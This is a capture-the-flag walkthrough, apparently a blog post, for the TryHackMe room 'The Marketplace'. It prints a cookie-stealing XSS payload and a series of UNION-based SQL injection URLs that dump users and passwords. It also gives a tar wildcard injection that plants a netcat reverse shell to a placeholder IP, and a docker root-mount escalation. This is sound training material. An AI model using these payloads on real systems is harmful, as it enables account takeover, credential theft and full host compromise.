TryHackMe solution: The Marketplace

Link: https://tryhackme.com/room/marketplace

#1 “What is flag 1?

First, we need to register as a new user and then login. View the first listing, there is a reporting feature.

In New listing, we can add new with a description, I think it may be vulnerable to XSS.

I try the payload.

<script>console.log(document.cookie)</script>

And it worked.

So we will create a new listing with the description is a payload.

<script>
var req = new XMLHttpRequest();
req.open('post','/contact/a',true);
req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
req.send('message='+document.cookie);
</script>

This payload will send cookie of anyone who view the listing to us as a message.

To make sure that the admin will view this listing, we will send a report to them by “Report listing to admins” option.

After reporting, we will receive the admin’s cookie.

Use this cookie to access Administration panel and we get the first flag.

#2 “What is flag 2? (User.txt)

As the admin, we can see the list of user.

Click an user and we access: /admin?user=1

I try:

/admin?user='

And we get an error message.

And this web is also vulnerable to SQLi when using MySQL.

To find the tables in this database, we use:

/admin?user=0+union+select+group_concat(table_name),null,null,null+from+information_schema.tables+where+table_schema=database()#

Find all columns in table users.

/admin?user=0+union+select+group_concat(column_name),null,null,null+from+information_schema.columns+where+table_schema=database()+and+table_name='users'#

Find all information of users.

/admin?user=0+union+select+group_concat(id,':',isAdministrator,':',password,':',username),null,null,null+from+users#

Do the same to the table messages. Find all columns.

/admin?user=0+union+select+group_concat(column_name),null,null,null+from+information_schema.columns+where+table_schema=database()+and+table_name='messages'#

Find all content of this table.

/admin?user=0+union+select+group_concat(id,':',is_read,':',message_content,':',user_from,':',user_to),null,null,null+from+messages#

This is the message from system to jake, so we have the ssh password of user jake.

Try to ssh to this server.

ssh jake@10.10.85.26

And we have the second flag.

#3 “What is flag 3? (Root.txt)

See what jake can run with sudo.

sudo -l

We can run file /opt/backups/backup.sh as michael.

This post guide us how to abusing wildcards for tar.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 1234 >/tmp/f" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Next, we execute

chmod 777 backup.tar
chmod 777 shell.sh
sudo -u michael ./backup.sh

to let michael have permission to run the file, and get michael‘s shell.

Michael is in group docker. Then, we will create a new container mounting the root filesystem.

Use:

python3 -c 'import pty; pty.spawn("/bin/sh")'

to spawning a TTY Shell.

See list of images with:

docker image ls

We will use alpine to create a container.

docker run -v /:/mnt --rm -it alpine sh

-v /:/mnt : mount the root directory of host to /mnt inside the container
--rm : remove the container after the user exits
-it : interactive and assign a tty
alpine : image to use to create container
sh : binary to run when the container starts

And we have the flag in /mnt/root.

Reference: The Marketplace : TryHackMe

Leave a comment

Design a site like this with WordPress.com
Get started